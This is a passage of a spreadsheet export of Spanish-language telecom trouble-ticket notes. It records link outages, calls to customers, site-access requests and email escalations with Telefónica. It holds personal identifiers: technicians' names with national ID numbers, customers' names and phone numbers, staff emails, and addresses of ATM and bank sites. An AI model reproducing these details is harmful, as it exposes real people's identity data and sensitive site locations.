SOLICITAMOS NOS POYEN EN GESTIONAR ACCESOS PARA EL PERSONAL TÉCNICO ASIGNADO A LA VISITA EL DÍA LUNES 20/06 A PARTIR DE LAS 7:00 HRS.
ADJUNTO LOS DATOS DEL PERSONAL ASIGNADO.
JUAN MIGUEL BERCIAN MORALES / / DPI 2226050730608
JORGE ALFREDO MARTINEZ ROSALES / / DPI 2292209672201
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>GESTIÓN N1 ENVIÓ CORREO A CLIENTE SOLICITÁNDOLE APOYO CON TELS ADICIONALES; EN ESPERA DE RESPUESTA DE CLIENTE:
ASUNTO: RE: CAÍDO ENLACE_CLARO-XT_PP2_SECUNDARIO_ID(672400015)</t>
  </si>
  <si>
    <t>SE ENVIA CORREO SOLICITADO NUEVO CONTACTO-
RE: CAÍDO ENLACE_CLARO-XT_PP2_SECUNDARIO_ID(672400015)</t>
  </si>
  <si>
    <t>SE TIENE CORREO DE CLIENTE DONDE AUTORIZA EL INGRESO A LAS INSTALACIONES HASTA EL DÍA LUNES 20 A PARTIR DE LAS 07:00AM, AVANCES HASTA ESE DÍA.
ASUNTO: RE: CAÍDO ENLACE_CLARO-XT_PP2_SECUNDARIO_ID(672400015)</t>
  </si>
  <si>
    <t>F4605624</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MELVIN CHACON 23049696 EXT 1 EXT 1 NO RESPONDE SI INTENTARA LUEGO **
-ID 3001832513
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MELVIN CHACON 23049696 EXT 1 EXT 1 NO RESPONDE SI INTENTARA LUEGO **
-ID 3001838610
**</t>
  </si>
  <si>
    <t>F4605627</t>
  </si>
  <si>
    <t>SE ENVIA CORREO DE GESTION DE ACCESOS
GESTION DE ACCESOS F4605627 | CC_TYT_GT_ATM0866 |TRANSACCIONES Y TRANSFERENCIAS S.A. |UBICACIÓN CAJERO 866 FARMACIA GALENO EL CERINAL, KM.48.9 CALLE ASFALTADA ALDEA EL CERINAL CARR AL SALVADOR BAR ZACAPA
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:OPERADORESIST@5B.COM.GTY 5 MÁS
CC:GRUPO N1;CNOCCA
SÁB 18/06/2022 14:10
 BUENA TARDE ESTIMADO CLIENTE,
   ES UN GUSTO SALUDARLE, EL PRESENTE ES PARA  SOLICITAR DE SU AMABLE APOYO CON GESTIONAR ACCESOS A NUESTRA ÁREA TÉCNICA PARA VERIFICAR SERVICIO,
 F4605627 | CC_TYT_GT_ATM0866 |TRANSACCIONES Y TRANSFERENCIAS S.A. |UBICACIÓN CAJERO 866 FARMACIA GALENO EL CERINAL, KM.48.9 CALLE ASFALTADA ALDEA EL CERINAL CARR AL SALVADOR BAR ZACAPA
AGRADECEMOS COORDINAR APERTURA LUNES 20/06/2022  A LAS 10:00 AM
TÉCNICOS:
TECNICO 	IBM	DPI
OSCAR OSWALDO PALALA MORENO	690043	1834 40153 0601
BRIAN ROGELIO JOSIMAR CARRILLO ARGUETA	530027	2215 80395 0101
EN ESPERA DE SUS COMENTARIOS</t>
  </si>
  <si>
    <t>F4605653</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE  ELSA GIRON, QUIEN INDICA QUE LABORAN EL DIA DE MAÑANA DE 8 A 12:00HRS. Y QUE NO SE NECESITAN PERMISOS DE INGRESO.
SE LE INDICO QUE EL TECNICO CONTINUA TRABAJANDO PROACTIVAMENTE PARA VER SI LOGRA LEVANTAR EL SERVICIO.
3001857276
COLA:
NOMBRE: A: 56942203
NÚMERO: 56942203
DURACIÓN: 0:00:14
ESTADO: CONECTADA
DETALLES: 56942203
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 17/06/2022 17:06:36</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE ELSA GIRON QUIEN VA APOYAR A REVISAR LOS EQUIPOS.
CLIENTE INDICA QUE ESTA EN ROJO LA LUZ DE LOS EN LA ONT.
SE REINCIO PERO NO HAY CAMBIOS
CLIENTE INDICA QUE SE RETIRAN A LAS 17:00HRS.
3001824986
COLA:
NOMBRE: A: 56942203
NÚMERO: 56942203
DURACIÓN: 0:00:26
ESTADO: CONECTADA
DETALLES: 56942203
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 17/06/2022 15:04:29</t>
  </si>
  <si>
    <t>F4605675</t>
  </si>
  <si>
    <t>SE LLAMAA CLIENTE VICTOR TECUN 37610279 MENCIONA QUE NECESIITA HABLAR CON UN GESTOR
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001830587</t>
  </si>
  <si>
    <t>F4605687</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605687
ID:  7800422T
IDENTIFICADOR DEL CLIENTE:  CC_GYT_GT_AGENCIA_163
UBICADO EN:   4 CALLE 03-43 ZONA 13 (PS 163 PROVAL) GUATEMALA (30 MTS)
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMA A OTRA EXTENSION OFIC.: (502) 2338 6801 EXT.: 32388 DE LA CENTRAL PERO NO SE LOGRA COMUNICACION
ID
1001499466
COLA:
NOMBRE: A: 23386801
NÚMERO: 22282801
DURACIÓN: 0:00:33
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 22282801
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 21/06/2022 16:23:05</t>
  </si>
  <si>
    <t>SE MARCA A NUMERO EN CENTRAL OFIC.: (502) 2338 6801 EXT.: 32320, PERO NO SE LOGRA COMUNICACION
GERENCIA DE INFRAESTRUCTURA Y OPERACIONES TECNOLÓGICAS
BOULEVARD LOS PRÓCERES, 18 CALLE 24-69 ZONA 10, CENTRO EMPRESARIAL ZONA PRADERA TORRE 5, NIVEL 5
OFIC.: (502) 2338 6801 EXT.: 32320
ID
1001498940
COLA:
NOMBRE: A: 23386801
NÚMERO: 22282801
DURACIÓN: 0:00:35
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 22282801
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 21/06/2022 16:21:16</t>
  </si>
  <si>
    <t>SE SOLICITA A PERSONAL DE SERVICIO AL CLIENTE COMUNICAR A LAS EXTENSIONES PERO SE FINALIZA LA COMUNICACION
ID
1001504205
COLA:
NOMBRE: A: 23386801
NÚMERO: 22282801
DURACIÓN: 0:01:19
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 22282801
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 21/06/2022 16:38:50</t>
  </si>
  <si>
    <t>SE LLAMA A NUMERO DE CENTRAL PERO NO SE LOGRA COMUNICACION 2338 6801 EXT 69122
ID
1001503160
COLA:
NOMBRE: A: 23386801
NÚMERO: 22282801
DURACIÓN: 0:00:42
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 22282801
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 21/06/2022 16:34:55</t>
  </si>
  <si>
    <t>YA QUE NO SE LOGRA COMUNICACION VIA LLAMADA A LOS NUMEROS QUE SE TIENEN, SE PROCEDE A ENVIAR CORREO, SE AGREGA  JFUENTES@GTC.COM.GT ,  CROMERO@GTC.COM.GT , ISAIAS ROJOP IROJOP@GTC.COM.GT
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
EN SEGUIMIENTO AL ENLACE ALARMADO EN NUESTRO MONITOREO PARA LA AGENCIA CC_GYT_GT_AGENCIA_163, SOLICITAMOS SU APOYO CON LO REQUERIDO EN CORREO ANTERIOR YA QUE ENLACE SE OBSERVA CAÍDO.
TICKET:  F4605687
ID:  7800422T
IDENTIFICADOR DEL CLIENTE:  CC_GYT_GT_AGENCIA_163
UBICADO EN:   4 CALLE 03-43 ZONA 13 (PS 163 PROVAL) GUATEMALA (30 MTS)
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE SOLICITA APOYO A CCTELECOMUNICACIONES@GTC.COM.GT, DSICA@GTC.COM.GT Y GGIRON@GTC.COM.GT
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
EN SEGUIMIENTO AL ENLACE ALARMADO EN NUESTRO MONITOREO PARA LA AGENCIA CC_GYT_GT_AGENCIA_163, SOLICITAMOS SU APOYO CON LO REQUERIDO EN CORREO ANTERIOR.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4605698</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JIMMY ESPINOZA  78520744 MENCIONA QUE ESTARA CONFIRMANDO POR CORREO CUANDO YA TENGA AUTORIZADOS LOS PERMISOS
-ID 1001274299</t>
  </si>
  <si>
    <t>F4605705</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS ALBERTO COJON AL 59228964   INDICA QUE A LA MEDIA HORA QUE SE FUERON LOS TECNICOS VOLVIO A CAER EL SERVICIO Y AHORITA NUEVAMENTE ESTA SIN SERVICIO || SE NOTIFICA A GESTOR **
-ID 3001835239
**</t>
  </si>
  <si>
    <t>F4605711</t>
  </si>
  <si>
    <t>DANIEL 54444457  SE TIENE EN LIENA ##VIVO</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE DANIEL 54444457  EN LIENA ##  INDICA QUE LO QUE REPORTA ES QUE UNA EXTENSION ESTA CAIADA ## SELE COMENTA QUE ESTO DEBE DE VALIDARLO A NIVEL INTERNO ## CLIENTE QUEDA ENTERADO ### NOSOTROS COMO CLARO NO VEMOS EXTENSIOINES
##CLIENTE DEBE ESCALAR CON SU PROVEEDOR DE PBX ##
## A NIVEL DE CLARO TODO OK#</t>
  </si>
  <si>
    <t>F4605739</t>
  </si>
  <si>
    <t>ENLACE OPERATIVO A NIVEL DE CLARO, SE VALIDARA CON CLIENTE...</t>
  </si>
  <si>
    <t>F4605745</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SAMARIA GRANADOS 87913026 MENCIONA QUE APLICARON REINICIO INTERNO Y LUEGO DE ELLO EL SERVICIO QUEDO FUNCIONANDO CORRECTAMENTE
-ID 3001841571</t>
  </si>
  <si>
    <t>F4605748</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MOISES MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001845426</t>
  </si>
  <si>
    <t>F4605786</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PARA VALIDAR SERVICIO SIN EMBARGO NO RESPONDE
82386140
&gt; NO SE TIENE GESTION DEL CPE, CL LO ADMINISTRA</t>
  </si>
  <si>
    <t>F4605805</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIA ELIZABETH RIVERA-47527841 ## VIVO ## INDIC QUE EL PROBBLEMA QUE TIEENE ES QUE UNO LLAMA Y NO SE ESCUCHAN LAS LLAMADAS O SE CORTAN ##</t>
  </si>
  <si>
    <t>CLIENTE GABRIEL GALVEZ 55275198 VALIDA QUE YA NO PRESENTARON INCONVENIENTES, AUTORIZA EL CIERRE DEL CASO. ID DE LLAMADA: 3001916229</t>
  </si>
  <si>
    <t>CLIENTE JULIA ELIZABETH RIVERA-47527841 INDICA QUE NO LABORA EL DÍA DE HOY SOLICITA SE CONSULTE CON GABRIEL GALVEZ 55275198 ID: 3001915146</t>
  </si>
  <si>
    <t>F4605836</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE SE ESTARA AL PENDIENTE DE SU RESPUESTA.
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: VIERNES, 17 DE JUNIO DE 2022 19:15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CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_BANCO_AGRICOLA_SV_BOLSA_DE_VAL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5836
ID: IP2001242SV
IDENTIFICADOR DEL CLIENTE:  CC_BANCO_AGRICOLA_SV_BOLSA_DE_VALORES
UBICADO EN:  ANTIGUO CUSCATLAN  URB. JARD. DE LA HACIENDA BOULEVARD MERLIOT  Y AV LAS CARRETAS
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SM NO INDICA DISEÑO, SE PROCEDE A CONTACTAR A CLIENTE PARA DESCARTAR TEMAS DE ENERGIA EN PUNTO REMOTO.</t>
  </si>
  <si>
    <t>F4605878</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE PARA VALIDACION DEL SERVICIO</t>
  </si>
  <si>
    <t>F4605890</t>
  </si>
  <si>
    <t>F4605895</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DE CLIENTE AUTORIZANDO EL CIERRE DEL TICKET, SE PROCEDE:
DE: GARCIA SANCHEZ E SERGIO IVANHOE [MAILTO:SGSANCHE@UNINET.COM.MX]
ENVIADO EL: SÁBADO, 18 DE JUNIO DE 2022 17:23
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 20559639PA &amp; 20558402PA ::: TICKET CNOC IMBBL004321 ::: "LENITITUD"
ESTIMADOS, GRACIAS POR SU APOYO.
FAVOR DE PROCEDER CON EL CIERRE DE ESTE CASO.
SALUDOS.</t>
  </si>
  <si>
    <t>F4605900</t>
  </si>
  <si>
    <t>***--- CL SOLICITA AVANCES, SE RETROALIMENTA --*-*
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: DOMINGO, 19 DE JUNIO DE 2022 01:25
PARA: SMC RECOVERY EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; SMC RECOVERY MANAGER EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERYMANAGER.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: INFINITY ROD INBOX &lt;INCOMING@INFINITY-MAIL.ONBMC.COM&gt;; LCE CARRIERS GLOBAL SOLUTIONS &lt;LCE.CARRIERS.GLOBALSOLUTIONS@TELEFONICA.COM&gt;
ASUNTO: RE: NUEVO TT | INCOMUNICACIÓN TOTAL | TGS TT: INC000003774172 | GUATEMALA | CLIENTE: TELEFONICA DATACORP
BUENOS DÍAS ESTIMADA SEÑORITA ALICIA.
                LAMENTAMOS LOS INCONVENIENTES, PERSONAL A CARGO NOS INDICA QUE DE LADO DE GUATEMALA TODO SE ENCUENTRA OPERATIVO Y ESTABLE.
ACTUALMENTE SE TIENE ESCALADO DEL LADO DE EL SALVADOR Y ESTAMOS A LA ESPERA DE AVANCES DE PARTE DE ELLOS.
ESPERAMOS COMPARTIR MÁS DETALLES A LA BREVEDAD POSIBLE.
CUALQUIER COSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: SMC RECOVERY EMEA BUSINESS SOLUTIONS [MAILTO:SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM]
ENVIADO EL: DOMINGO, 19 DE JUNIO DE 2022 01:13
PARA: LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; SMC RECOVERY MANAGER EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERYMANAGER.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: INFINITY ROD INBOX &lt;INCOMING@INFINITY-MAIL.ONBMC.COM&gt;; LCE CARRIERS GLOBAL SOLUTIONS &lt;LCE.CARRIERS.GLOBALSOLUTIONS@TELEFONICA.COM&gt;; SMC RECOVERY EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;
ASUNTO: RE: NUEVO TT | INCOMUNICACIÓN TOTAL | TGS TT: INC000003774172 | GUATEMALA | CLIENTE: TELEFONICA DATACORP
ESTIMADO EQUIPO,
LES AGRADECEMOS SU INFORMACIÓN Y         LES RECORDAMOS QUE ESTAMOS A LA ESPERA DE SUS AVANCES.
RECIBAN UN CORDIAL SALUDO,
ALICIA ARILLA DERIAT
CUSTOMER OP. &amp; TECH ¿ INCIDENT MANAGEMENT NETWORKING EMEA
TELEFÓNICA GLOBAL SOLUTIONS | EXTERNAL CONSULTANT
FIX PHONE +34 917 697 640
EMAIL SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM
________________________________________</t>
  </si>
  <si>
    <t>***--- SE RESPONDE CORREO A CL -**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MIÉRCOLES, 6 DE JULIO DE 2022 00:05
PARA: SMC RECOVERY EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;
CC: FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; INFINITY ROD INBOX &lt;INCOMING@INFINITY-MAIL.ONBMC.COM&gt;; SMC RECOVERY MANAGER EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERYMANAGER.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;; KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; DIAZ ROMAN JESUS &lt;JESUS.DIAZROMAN@TELEFONICA.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; BRYAN.VALLEJO@CLARO.COM.GT
ASUNTO: RE: PETICIÓN ESCALADO | RE: NEW INCIDENT // TELEFONICA DATACORP // GUATEMALA // CID:C-0022700202 // TT:INC000003789251 // TOTAL ISOLATION
BUENOS DÍAS ESTIMADO SR. OSORIO.
                CON GUSTO SE NOTIFICARAN AVANCES O INFORMACIÓN DE OBTENER LA MISMA ANTES DEL VIERNES, SEGÚN LA COLA DE CORREOS ADJUNTA.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: SMC RECOVERY EMEA BUSINESS SOLUTIONS [MAILTO:SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM]
ENVIADO EL: MARTES, 5 DE JULIO DE 2022 23:59
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; BRYAN.VALLEJO@CLARO.COM.GT
CC: FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; INFINITY ROD INBOX &lt;INCOMING@INFINITY-MAIL.ONBMC.COM&gt;; SMC RECOVERY MANAGER EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERYMANAGER.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;; KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; DIAZ ROMAN JESUS &lt;JESUS.DIAZROMAN@TELEFONICA.COM&gt;
ASUNTO: RE: PETICIÓN ESCALADO | RE: NEW INCIDENT // TELEFONICA DATACORP // GUATEMALA // CID:C-0022700202 // TT:INC000003789251 // TOTAL ISOLATION
BUENOS DÍAS,
QUEDAMOS ATENTOS A SI ES POSIBLE ACELERAR EL PROCESO Y SUS NOVEDADES.
GRACIAS Y SALUDOS,
HÉCTOR OSORIO
CUSTOMER OP. &amp; TECH ¿ INCIDENT MANAGEMENT NETWORKING EMEA
TELEFÓNICA GLOBAL SOLUTIONS | EXTERNAL CONSULTANT
FIX PHONE +34 917 697 640
EMAIL SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM</t>
  </si>
  <si>
    <t>***--- SE RESPONDE CORREO A CL --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MIÉRCOLES, 6 DE JULIO DE 2022 02:05
PARA: SMC RECOVERY EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;; KEVIN OBRIAN GARCIA MALDONADO &lt;KEVIN.GARCIA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;
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
ASUNTO: RE: NUEVO TICKET// TELEFONICA DATACORP // GUATEMALA // CID: 697300001T // TT:INC000003787930 // TOTAL ISOLATION // CLARO TT: SD1136132
BUENOS DÍAS ESTIMADO SR. ABRAHAM.
                LAMENTAMOS LOS INCONVENIENTES,  DE MOMENTO NO SE PUEDE CONFIRMAR QUE SE ADELANTE EL TIEMPO ESTIMADO PARA AVANCES.
DE NUESTRO LADO ESTAREMOS NOTIFICANDO SI SE CUENTA CON INFORMACIÓN ANTES DE LO PREVISTO Y/O SE REALIZARON LOS TRABAJOS.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: SMC RECOVERY EMEA BUSINESS SOLUTIONS [MAILTO:SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM]
ENVIADO EL: MIÉRCOLES, 6 DE JULIO DE 2022 01:47
PARA: KEVIN OBRIAN GARCIA MALDONADO &lt;KEVIN.GARCIA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;
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 SMC RECOVERY EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;
ASUNTO: RE: NUEVO TICKET// TELEFONICA DATACORP // GUATEMALA // CID: 697300001T // TT:INC000003787930 // TOTAL ISOLATION // CLARO TT: SD1136132
BUENAS,
PUEDEN INDICAR SI ESTA FECHA PUEDE ADELANTARSE Y AGILIZAR LA ENTREGA DE LA TARJETA?
SALUDOS
ABRAHAM NAKFOUR
CUSTOMER OP. &amp; TECH ¿ INCIDENT MANAGEMENT NETWORKING EMEA SHIFT LEADER
TELEFÓNICA GLOBAL SOLUTIONS | EXTERNAL CONSULTANT
FIX PHONE +34 917 697 640
EMAIL SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM</t>
  </si>
  <si>
    <t>***--- SE RESPONDE CORREO A CL --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: VIERNES, 1 DE JULIO DE 2022 03:46
PARA: MARIO MOYA ANDRES &lt;MARIO.MOYA@TELEFONICA.COM&gt;; GUSTAVO ADOLFO BARAHONA PUTUL &lt;GUSTAVO.BARAHONA@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; SMC RECOVERY EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;; DIEGO PABLO AJIN HERNANDEZ &lt;DIEGO.AJIN@CLARO.COM.GT&gt;
CC: INFINITY ROD INBOX &lt;INCOMING@INFINITY-MAIL.ONBMC.COM&gt;; SMC RECOVERY MANAGER EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERYMANAGER.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;; LCE CARRIERS GLOBAL SOLUTIONS &lt;LCE.CARRIERS.GLOBALSOLUTIONS@TELEFONICA.COM&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; ANGEL ARMANDO CLAVEL TOLEDO &lt;ANGEL.CLAVEL@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; GUSTAVO ADOLFO GUERRA MORAN &lt;GUSTAVO.GUERRA@CLARO.COM.GT&gt;
ASUNTO: RE: NUEVO TT | INCOMUNICACIÓN TOTAL | TGS TT: INC000003774172 | GUATEMALA | CLIENTE: TELEFONICA DATACORP
BUENOS DÍAS ESTIMADO SR. MOYA.
                RESPECTO A SU SOLICITUD, DE MOMENTO NO CONTAMOS CON EL HORARIO ESPECIFICO SIN EMBARGO AL OBTENERLO SE COMPARTIRÁ ADICIONAL A LOS AVANCES AL MOMENTO DE FINALIZAR LOS TRABAJOS POR PARTE DE LAS ÁREAS INVOLUCRADAS.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: MARIO MOYA ANDRES [MAILTO:MARIO.MOYA@TELEFONICA.COM]
ENVIADO EL: VIERNES, 1 DE JULIO DE 2022 03:37
PARA: GUSTAVO ADOLFO BARAHONA PUTUL &lt;GUSTAVO.BARAHONA@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; SMC RECOVERY EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;; DIEGO PABLO AJIN HERNANDEZ &lt;DIEGO.AJIN@CLARO.COM.GT&gt;
CC: INFINITY ROD INBOX &lt;INCOMING@INFINITY-MAIL.ONBMC.COM&gt;; SMC RECOVERY MANAGER EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERYMANAGER.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;; LCE CARRIERS GLOBAL SOLUTIONS &lt;LCE.CARRIERS.GLOBALSOLUTIONS@TELEFONICA.COM&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; ANGEL ARMANDO CLAVEL TOLEDO &lt;ANGEL.CLAVEL@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; GUSTAVO ADOLFO GUERRA MORAN &lt;GUSTAVO.GUERRA@CLARO.COM.GT&gt;
ASUNTO: RE: NUEVO TT | INCOMUNICACIÓN TOTAL | TGS TT: INC000003774172 | GUATEMALA | CLIENTE: TELEFONICA DATACORP
GRACIAS GUSTAVO!
                NOS DEJAN SABER.
SALUDOS,</t>
  </si>
  <si>
    <t>***--- SE RESPONDE CORREO A CL --*-*
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: VIERNES, 1 DE JULIO DE 2022 02:57
PARA: SMC RECOVERY MANAGER EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERYMANAGER.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;
CC: INFINITY ROD INBOX &lt;INCOMING@INFINITY-MAIL.ONBMC.COM&gt;; LCE CARRIERS GLOBAL SOLUTIONS &lt;LCE.CARRIERS.GLOBALSOLUTIONS@TELEFONICA.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; SMC RECOVERY EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;; KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;
ASUNTO: RE: NUEVO TICKET// TELEFONICA DATACORP // GUATEMALA // CID: 697300001T // TT:INC000003787930 // TOTAL ISOLATION // CLARO TT: SD1136132
BUENOS DÍAS ESTIMADA SEÑORITA FRANCO.
                LAMENTAMOS LOS INCONVENIENTES, ACTUALMENTE NO SE CUENTA CON EL ETR PARA LA FINALIZACIÓN DEL CAMBIO PARA SOLVENTAR LA FALLA GENERAL EN EL ÁREA.
